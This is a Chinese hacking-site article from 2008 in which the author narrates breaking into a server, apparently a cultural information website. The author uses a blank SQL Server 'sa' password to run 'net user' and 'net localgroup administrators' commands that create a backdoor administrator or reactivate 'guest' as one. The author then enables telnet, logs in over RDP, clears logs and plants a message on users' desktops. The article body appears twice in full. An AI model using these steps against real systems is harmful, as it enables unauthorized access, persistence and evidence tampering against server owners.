SQL配合3389的一次入侵(图)
互联网 发布时间:2008-10-08 19:37:45 作者:佚名 
我要评论
我要评论昨天晚上,朋友给我一台漏洞颇多的主机,哈哈,我没别的意思,只是练一下手而已,顺便把过程写下来,这台主机的漏洞实在多,CGI漏洞就30多个,SQL的sa这个用户的密码为空,开的端口12个,这台主机是100M的宽带,用来做“轰炸鸡”不错,一看这个网站,靠,居然是文化信息网
昨天晚上,朋友给我一台漏洞颇多的主机,哈哈,我没别的意思,只是练一下手而已,顺便把过程写下来,这台主机的漏洞实在多,CGI漏洞就30多个,SQL的sa这个用户的密码为空,开的端口12个,这台主机是100M的宽带,用来做“轰炸鸡”不错,一看这个网站,靠,居然是文化信息网,不敢打歪主意了,先进去看看,打开SqlExec.exe,这是连接数据库用的工具,收藏在“黑客入侵必备工具包”(下载地址http://www.sangel.net)里,在HOST那里填上对方IP,用户名为sa,密码为空就不用填,然后点Connnect就开始连接了,如图:
这样就表示连接成功,大家都知道sa是SQL数据库的管理员,所以可以执行任意指令,我们就在
DOS Commamd输入:
net user root 521521 /add
net localgroup administrators root /add
文章看多了也应该知道这是什么意思了吧?不用说了。看到成功的提示了,如图:
这样就留下后门了,看看是否填加了?输入:net user。哈哈,添加成功了,如图:
但我还是建议不要添加用户,否则很容易被看穿,所以我建议你在guest这个用户上做手脚,输入下面命令:
net user guest /adtive:yes
net user guest 521521
net localgroup administrators guest /add
就这样就激活了guest这个帐号,并把它的密码设为521521,还添加进管理员组,如果帐号本来就是的活的,就直接输入倒数两行命令就可以了,别忘了,如果目标主机没有开23端口的话,记得为它运行远程登陆服务,输入:net start telnet。现在我们有管理员帐号了,想做什么还不随心所欲?这台主机还开了3389端口,赶快用“终端服务客户端”(收藏在“黑客入侵必备工具包”里面),连接上去,就像操作自己的电脑一样,如下图:
点“连接”后过一会儿成功的话就到windows2000的登陆窗口,输入用户名和密码进去吧,如图:
点年“确定”一会就进去了,首先映入眼帘的是桌面,如图:
先冲到“控制面板”玩玩,如图:
点“管理工具”进去管理吧。如图:
你可以干什么都行,处理一下日志先,然后管理一下用户,如图
想黑他的主页很容易的,现在还不知道主页目录是什么,我们可以到网站上看一张图片的文件名,然后进来搜索就好了,看HTML代码知道相对路径,然后你看着办吧!国内主机还是不要做什么的好,否则很可能第二天收到法庭的传单就不好了,如果你破坏了数据就不是黑客了,是骇客,这个名声可不好啊!我看看好象网站没有联系方法,我干脆就在桌面留言了,看看程序组有什么?哈哈,有Macromedia Dreamweaver 4,做个HTML页面,如图:
取个醒目的名字叫“全部人员看这里”吧,然后把文件复制到各个用户的桌面,路径是:
c:\Documents and Settings\用户名\桌面
这次行动也就结束了,我真为我国的网络安全质量担忧啊,特别是管理员的素质,为什么偏偏别人认为我们这样进入就不好呢?我觉得被我们进入总好过不法之徒进入吧?如果让我们这些业余的替换掉这些现任管理员,可能我国的网络就不会像这么弱不禁风了吧。我写这篇文章没有叫你去攻击,也没有叫你去破坏,权当学习参考,如果你因本文而进入国内主机,请不要修改任何数据或执行任何毁灭性操作,并通知其管理员,谢谢合作,另外,本文有和遗漏 或错误,请指出,谢谢支持!
这样就表示连接成功,大家都知道sa是SQL数据库的管理员,所以可以执行任意指令,我们就在
DOS Commamd输入:
net user root 521521 /add
net localgroup administrators root /add
文章看多了也应该知道这是什么意思了吧?不用说了。看到成功的提示了,如图:
这样就留下后门了,看看是否填加了?输入:net user。哈哈,添加成功了,如图:
但我还是建议不要添加用户,否则很容易被看穿,所以我建议你在guest这个用户上做手脚,输入下面命令:
net user guest /adtive:yes
net user guest 521521
net localgroup administrators guest /add
就这样就激活了guest这个帐号,并把它的密码设为521521,还添加进管理员组,如果帐号本来就是的活的,就直接输入倒数两行命令就可以了,别忘了,如果目标主机没有开23端口的话,记得为它运行远程登陆服务,输入:net start telnet。现在我们有管理员帐号了,想做什么还不随心所欲?这台主机还开了3389端口,赶快用“终端服务客户端”(收藏在“黑客入侵必备工具包”里面),连接上去,就像操作自己的电脑一样,如下图:
点“连接”后过一会儿成功的话就到windows2000的登陆窗口,输入用户名和密码进去吧,如图:
点年“确定”一会就进去了,首先映入眼帘的是桌面,如图:
先冲到“控制面板”玩玩,如图:
点“管理工具”进去管理吧。如图:
你可以干什么都行,处理一下日志先,然后管理一下用户,如图
想黑他的主页很容易的,现在还不知道主页目录是什么,我们可以到网站上看一张图片的文件名,然后进来搜索就好了,看HTML代码知道相对路径,然后你看着办吧!国内主机还是不要做什么的好,否则很可能第二天收到法庭的传单就不好了,如果你破坏了数据就不是黑客了,是骇客,这个名声可不好啊!我看看好象网站没有联系方法,我干脆就在桌面留言了,看看程序组有什么?哈哈,有Macromedia Dreamweaver 4,做个HTML页面,如图:
取个醒目的名字叫“全部人员看这里”吧,然后把文件复制到各个用户的桌面,路径是:
c:\Documents and Settings\用户名\桌面
这次行动也就结束了,我真为我国的网络安全质量担忧啊,特别是管理员的素质,为什么偏偏别人认为我们这样进入就不好呢?我觉得被我们进入总好过不法之徒进入吧?如果让我们这些业余的替换掉这些现任管理员,可能我国的网络就不会像这么弱不禁风了吧。我写这篇文章没有叫你去攻击,也没有叫你去破坏,权当学习参考,如果你因本文而进入国内主机,请不要修改任何数据或执行任何毁灭性操作,并通知其管理员,谢谢合作,另外,本文有和遗漏 或错误,请指出,谢谢支持!
相关文章
CC主要是用来攻击页面的,大家都有这样的经历,就是在访问论坛时,如果这个论坛比较大,访问的人比较多,打开页面的速度会比较慢,对不?!一般来说,访问的人越多,论坛的页2024-01-06
入侵者主要通过Potato程序攻击拥有SYSTEM权限的端口伪造网络身份认证过程,利用NTLM重放机制骗取SYSTEM身份令牌,最终取得系统权限,该安全风险微软并不认为存在漏洞,所以2021-04-15
这篇文章主要介绍了文件上传漏洞全面渗透分析小结,这里主要为大家分享一下防御方法,需要的朋友可以参考下2021-03-21- 这篇文章主要介绍了sql手工注入语句&SQL手工注入大全,需要的朋友可以参考下2017-09-06
- 这篇文章主要介绍了详解Filezilla server 提权,需要的朋友可以参考下2017-05-13
FileZilla Server 2008 x64 提权与防御方法
这篇文章主要介绍了FileZilla Server 2008 x64 提权与防御方法,需要的朋友可以参考下2017-05-13- 不久之前我们说过关于http和https的区别,对于加密的https,我们一直认为它是相对安全的,可今天要讲的是,一种绕过HTTPS加密得到明文信息的web攻击方式,不知道这消息对你2016-08-10
iPhone和Mac也会被黑 一条iMessage密码可能就被盗了
一直以来苹果系统的安全性都是比安卓要高的,但是再安全的系统也免不了漏洞,苹果也一样。最近爆出的新漏洞,只需要接收一条多媒体信息或者iMessage就会导致用户信息泄露。2016-07-27- 国家正在修正关于黑客方面的法律法规,有一条震惊黑客圈的“世纪佳缘”起诉白帽黑客事件,深深的伤害了广大黑客们的心,加上扎克伯格和特拉维斯·卡兰尼克账号被盗,于是黑2016-07-11
如何逆向破解HawkEye keylogger键盘记录器进入攻击者邮箱
面对恶意邮件攻击,我们就只能默默忍受被他攻击,连自我保护能力都没有谈什么反抗?让人痛快的是,如今有了解决办法,逆向破解键盘记录器,进入攻击者邮箱2016-07-06
最新评论